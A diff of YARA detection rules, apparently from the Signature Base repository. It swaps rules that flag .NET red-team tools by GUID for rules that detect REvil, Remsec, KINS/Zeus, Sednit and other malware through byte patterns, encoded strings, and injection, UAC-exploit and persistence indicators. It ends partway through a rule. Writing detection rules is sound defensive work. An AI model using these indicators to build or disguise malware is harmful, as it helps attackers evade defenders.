-rule SIGNATURE_BASE_HKTL_NET_GUID_Unmanagedpowershell : FILE
+rule SIGNATURE_BASE_Furtim_Parent_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "49ff1362-0ac5-580d-97f3-516f2a10072b"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/leechristensen/UnmanagedPowerShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3757-L3771"
+		description = "Detects Furtim Parent Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a47719d2-1e4f-50a9-b340-55e13f5a24d5"
+		date = "2016-07-16"
+		modified = "2023-12-05"
+		reference = "https://sentinelone.com/blogs/sfg-furtims-parent/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_furtim.yar#L34-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "26e59a31b1021c6e65711ee8d58cfdf3e1a8563b91f0f55722e1306854103ac6"
+		logic_hash = "ab4c7ca5c887b2a2f2949a5a6fd0d623dad47d9c1f866fb43f7f8ec38dfa6a02"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963"
 
 	strings:
-		$typelibguid0lo = "dfc4eebb-7384-4db5-9bad-257203029bd9" ascii wide
-		$typelibguid0up = "DFC4EEBB-7384-4DB5-9BAD-257203029BD9" ascii wide
+		$x1 = "dqrChZonUF" fullword ascii
+		$s1 = "Egistec" fullword wide
+		$s2 = "Copyright (C) 2016" fullword wide
+		$op1 = { c0 ea 02 88 55 f8 8a d1 80 e2 03 }
+		$op2 = { 5d fe 88 55 f9 8a d0 80 e2 0f c0 }
+		$op3 = { c4 0c 8a d9 c0 eb 02 80 e1 03 88 5d f8 8a d8 c0 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( $x1 or ( all of ( $s* ) and all of ( $op* ) ) ) ) or all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Quasar : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Revil_Oct20_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b938cf7d-27fd-5fa2-b0e5-d4da5670f3ef"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/quasar/Quasar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3773-L3789"
+		description = "Detects REvil ransomware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0c85a2cc-3487-577f-bd12-e3effd8fc811"
+		date = "2020-10-13"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_revil.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "752602eecc404757f029aea481a58dc5b3d4c80f53fea1281e1ab8a78476d416"
+		logic_hash = "756e49362c01abbca3208967630f09ed957e5c51956e0e5210b0167590582a82"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4"
+		hash2 = "f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5"
+		hash3 = "f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d"
+		hash4 = "fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501"
 
 	strings:
-		$typelibguid0lo = "cfda6d2e-8ab3-4349-b89a-33e1f0dab32b" ascii wide
-		$typelibguid0up = "CFDA6D2E-8AB3-4349-B89A-33E1F0DAB32B" ascii wide
-		$typelibguid1lo = "c7c363ba-e5b6-4e18-9224-39bc8da73172" ascii wide
-		$typelibguid1up = "C7C363BA-E5B6-4E18-9224-39BC8DA73172" ascii wide
+		$op1 = { 0f 8c 74 ff ff ff 33 c0 5f 5e 5b 8b e5 5d c3 8b }
+		$op2 = { 8d 85 68 ff ff ff 50 e8 2a fe ff ff 8d 85 68 ff }
+		$op3 = { 89 4d f4 8b 4e 0c 33 4e 34 33 4e 5c 33 8e 84 }
+		$op4 = { 8d 85 68 ff ff ff 50 e8 05 06 00 00 8d 85 68 ff }
+		$op5 = { 8d 85 68 ff ff ff 56 57 ff 75 0c 50 e8 2f }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them or 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpadidnsdump : FILE
+rule SIGNATURE_BASE_Remsec_Executable_Blob_32
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "51d50b22-4e73-5378-9e0d-ad7730987293"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/b4rtik/SharpAdidnsdump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3791-L3805"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "d7a7e57a-b117-5da8-a7a2-4c6351bd9072"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L8-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fe1bfdd03fabe40c2b885121de343890dd7eea22b51e9a1133d0842ba1080c78"
-		score = 75
+		logic_hash = "1cfc43ab15b3d220a636c150315c30f5654e53fad67d20534ce4d5c00295e35e"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "cdb02bc2-5f62-4c8a-af69-acc3ab82e741" ascii wide
-		$typelibguid0up = "CDB02BC2-5F62-4C8A-AF69-ACC3AB82E741" ascii wide
+		$code = { 31 06 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 F0 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnettojscript : FILE
+rule SIGNATURE_BASE_Remsec_Executable_Blob_64
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "31827074-fc63-5690-b6c7-8e89daacc07f"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/tyranid/DotNetToJScript"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3807-L3821"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "22345f40-3dae-5d5b-acc6-c67394475636"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L22-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ddaa4e3dac9d98f3aba0eff7a968a7599c2901ec8b668c5e1115ac67a0a77f30"
-		score = 75
+		logic_hash = "957e5b6afabec3fb1b169dd85d0e950107e219f7dec8ef779a18bd90d9824a97"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "7e3f231c-0d0b-4025-812c-0ef099404861" ascii wide
-		$typelibguid0up = "7E3F231C-0D0B-4025-812C-0EF099404861" ascii wide
+		$code = { 31 06 48 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 EF }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Inferno : FILE
+rule SIGNATURE_BASE_Remsec_Executable_Blob_Parser
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "af2d9832-c7f9-5879-a19b-a3c4d91b8b3f"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/LimerBoy/Inferno"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3823-L3837"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "b2189bfe-7b84-5fe9-8829-64f49d1e2030"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L36-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a3255a00a1c2773d34e9e859c3394752ea6bfc164c4694a001c9a1c9b384756b"
-		score = 75
+		logic_hash = "2f6db962807c07ff1bbe8b53eeb386d7b0ac88f95b76439c0d8b65d597739bdd"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "26d498f7-37ae-476c-97b0-3761e3a919f0" ascii wide
-		$typelibguid0up = "26D498F7-37AE-476C-97B0-3761E3A919F0" ascii wide
+		$code = { ( 0F 82 ?? ?? 00 00 | 72 ?? ) ( 80 | 41 80 ) ( 7? | 7C 24 ) 04 02 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 81 | 41 81 ) ( 3? | 3C 24 | 7D 00 ) 02 AA 02 C1 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 8B | 41 8B | 44 8B | 45 8B ) ( 4? | 5? | 6? | 7? | ?4 24 | ?C 24 ) 06 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsearch : FILE
+rule SIGNATURE_BASE_Remsec_Encrypted_Api
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "459d8a34-f311-5459-8257-e7aa519174b5"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/djhohnstein/SharpSearch"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3839-L3853"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "1aa3380b-d704-5eb9-b25d-f4bf20ae7179"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L50-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b213a12913abb631d67bf53049241a7087e3f9cda01fa66bd6c51bb1bd03c41f"
-		score = 75
+		logic_hash = "4f10c24a8480c17c2939fe3fecba2820b22f8a47bc2b2e73ac1080a355025d7c"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "98fee742-8410-4f20-8b2d-d7d789ab003d" ascii wide
-		$typelibguid0up = "98FEE742-8410-4F20-8B2D-D7D789AB003D" ascii wide
+		$open_process = { 91 9A 8F B0 9C 90 8D AF 8C 8C 9A FF }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsecdump : FILE
+rule SIGNATURE_BASE_Remsec_Packer_A
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "492dfb79-541a-589d-ac69-468e9b2ab9db"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/G0ldenGunSec/SharpSecDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3855-L3869"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "d75198ab-b1ea-572a-a674-9a38c3e2958b"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L64-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "645e2df929b88526daec94f5b828235899fe0c86822960777664f11106b8da8c"
-		score = 75
+		logic_hash = "b46a41686fbf1c63e8a8b583859f23bf789bc9f11ee6b1fb01bb08e602772e76"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7" ascii wide
-		$typelibguid0up = "E2FDD6CC-9886-456C-9021-EE2C47CF67B7" ascii wide
+		$code = { 69 ( C? | D? | E? | F? ) AB 00 00 00 ( 81 | 41 81 ) C? CD 2B 00 00 ( F7 | 41 F7 ) E? ( C1 | 41 C1 ) E? 0D ( 69 | 45 69 ) ( C? | D? | E? | F? ) 85 CF 00 00 ( 29 | 41 29 | 44 29 | 45 29 | 2B | 41 2B | 44 2B | 45 2B ) }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Net_Gpppassword : FILE
+rule SIGNATURE_BASE_Remsec_Packer_B
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a718f9fc-acf5-536e-81d6-d393cebe8f77"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/outflanknl/Net-GPPPassword"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3871-L3885"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "18e7f84e-27f2-532d-9ead-0db6e9e6c0b2"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L78-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "234f75bfcb9aee331f063bd7c1984a2696067400fde7a1938a4929cd809b1345"
-		score = 75
+		logic_hash = "9c63b5934d60b59a33364ef56c913220e59b9798a682a7f97e6755270adf4e4b"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "00fcf72c-d148-4dd0-9ca4-0181c4bd55c3" ascii wide
-		$typelibguid0up = "00FCF72C-D148-4DD0-9CA4-0181C4BD55C3" ascii wide
+		$code = { 48 8B 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) ( 44 88 6? 24 ?? | C6 44 24 ?? 00 ) 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) C7 44 24 ?? 0? 00 00 00 2B ?8 48 89 ?C 24 ?? 44 89 6? 24 ?? 83 C? 08 89 ?C 24 ?? ( FF | 41 FF ) D? ( 05 | 8D 88 ) 00 00 00 3A }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Filesearcher : FILE
+rule SIGNATURE_BASE_KINS_Dropper
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1b5f1f68-f87b-5e60-94a4-e2556b4e6c5d"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/NVISO-BE/FileSearcher"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3887-L3901"
+		description = "Match protocol, process injects and windows exploit present in KINS dropper"
+		author = "AlienVault Labs aortega@alienvault.com"
+		id = "17e12685-aaad-5d83-949c-43d5aef1ef0d"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/arPhm3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kins_dropper.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "71492c6d4c1104cf47484556dc8ed1099348043102a4b7a9b1ffd180422078af"
+		logic_hash = "cdab93f823e13e0c3104de8e05cb1572f83fb5294f359698092d73fc7983955b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "2c879479-5027-4ce9-aaac-084db0e6d630" ascii wide
-		$typelibguid0up = "2C879479-5027-4CE9-AAAC-084DB0E6D630" ascii wide
+		$n1 = "tid=%d&ta=%s-%x" fullword
+		$n2 = "fid=%d" fullword
+		$n3 = "%[^.].%[^(](%[^)])" fullword
+		$i0 = "%s [%s %d] 77 %s"
+		$i01 = "Global\\%s%x"
+		$i1 = "Inject::InjectProcessByName()"
+		$i2 = "Inject::CopyImageToProcess()"
+		$i3 = "Inject::InjectProcess()"
+		$i4 = "Inject::InjectImageToProcess()"
+		$i5 = "Drop::InjectStartThread()"
+		$uac1 = "ExploitMS10_092"
+		$uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
+		$uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of ( $n* ) and 2 of ( $i* ) and 2 of ( $uac* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Adfsdump : FILE
+rule SIGNATURE_BASE_KINS_DLL_Zeus
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8cb2edcd-3696-5857-90ca-e99b1af54320"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/fireeye/ADFSDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3903-L3917"
+		description = "Match default bot in KINS leaked dropper, Zeus"
+		author = "AlienVault Labs aortega@alienvault.com"
+		id = "968ada06-c8a1-5053-95de-10aa484231cb"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/arPhm3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kins_dropper.yar#L28-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5bf4c506a39a3ad33a19ab40ce85e6fb7c7efeab154444b14f008c22529b0779"
+		logic_hash = "bd1ebe7976d1f93856b4f8d1d62d8fff68ce6234204da9fbdc233ddbef56864d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "9ee27d63-6ac9-4037-860b-44e91bae7f0d" ascii wide
-		$typelibguid0up = "9EE27D63-6AC9-4037-860B-44E91BAE7F0D" ascii wide
+		$n1 = "%BOTID%" fullword
+		$n2 = "%opensocks%" fullword
+		$n3 = "%openvnc%" fullword
+		$n4 = /Global\\(s|v)_ev/ fullword
+		$s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
+		$s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
+		$s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
+		$s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
+		$s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of ( $n* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharprdp : FILE
+rule SIGNATURE_BASE_PUP_Installrex_Antifwb : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d316ec0b-0313-52bb-923d-512fa08112f9"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xthirteen/SharpRDP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3919-L3933"
+		description = "Malware InstallRex / AntiFW"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b327527e-8b88-5292-933b-102bd76df4eb"
+		date = "2015-05-13"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_antifw_installrex.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c1a51c556c3416095764d3e053d82081409cdd672db05b8680a985ec52bd24b8"
-		score = 75
+		hash = "bb5607cd2ee51f039f60e32cf7edc4e21a2d95cd"
+		logic_hash = "04f25497ee9a9af20179b81679d993315d6bb3d7bf7d8e9cbb01374395019610"
+		score = 55
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "f1df1d0f-ff86-4106-97a8-f95aaf525c54" ascii wide
-		$typelibguid0up = "F1DF1D0F-FF86-4106-97A8-F95AAF525C54" ascii wide
+		$s4 = "Error %u while loading TSU.DLL %ls" fullword ascii
+		$s7 = "GetModuleFileName() failed => %u" fullword ascii
+		$s8 = "TSULoader.exe" fullword wide
+		$s15 = "\\StringFileInfo\\%04x%04x\\Arguments" wide
+		$s17 = "Tsu%08lX.dll" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcall : FILE
+rule SIGNATURE_BASE_MAL_Sednit_Delphidownloader_Apr18_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "172415b6-0383-5da4-a88f-8ebe5daf9294"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/jhalon/SharpCall"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3935-L3949"
+		description = "Detects malware from Sednit Delphi Downloader report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6ccd2f21-de44-52fb-912e-d3ecbe57e389"
+		date = "2018-04-24"
+		modified = "2023-12-05"
+		reference = "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sednit_delphidownloader.yar#L11-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7084ac8956827fff5baefb92e117e0c64f13ab8f77cb5d034c31d874a6297047"
+		logic_hash = "32acbec3405007afce22b0521785439686338d4d3beb02a1d7b9005e49d87221"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda"
+		hash2 = "657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4"
+		hash3 = "5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182"
+		hash4 = "0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f"
+		hash5 = "72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3"
 
 	strings:
-		$typelibguid0lo = "c1b0a923-0f17-4bc8-ba0f-c87aff43e799" ascii wide
-		$typelibguid0up = "C1B0A923-0F17-4BC8-BA0F-C87AFF43E799" ascii wide
+		$s1 = "2D444F574E4C4F41445F53544152542D" ascii
+		$s2 = "55504C4F41445F414E445F455845435554455F46494C45" ascii
+		$s3 = "4D6F7A696C6C612076352E31202857696E646F7773204E5420362E313B2072763A362E302E3129204765636B6F2F32303130303130312046697265666F782F36" ascii
+		$s4 = "41646F62654461696C79557064617465" ascii
+		$s5 = "53595354454D494E464F2026205441534B4C495354" ascii
+		$s6 = "6373727376632E657865" ascii
+		$s7 = "536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E" ascii
+		$s8 = "5C536F6674776172655C4D6963726F736F66745C57696E646F7773204E545C43757272656E7456657273696F6E" ascii
+		$s9 = "5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E" ascii
+		$s0 = "2D444F574E4C4F41445F53544152542D" ascii
+		$fp1 = "<key name=\"profiles\">"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 4000KB and 1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ysoserial_Net : FILE
+rule SIGNATURE_BASE_MAL_Sednit_Delphidownloader_Apr18_3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "80483cd4-76e6-5629-bed7-4ae2e455222c"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/pwntester/ysoserial.net"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3951-L3967"
+		description = "Detects malware from Sednit Delphi Downloader report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2200fbdc-3600-51d4-a273-dc7fd4127c05"
+		date = "2018-04-24"
+		modified = "2023-01-06"
+		reference = "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sednit_delphidownloader.yar#L40-L62"
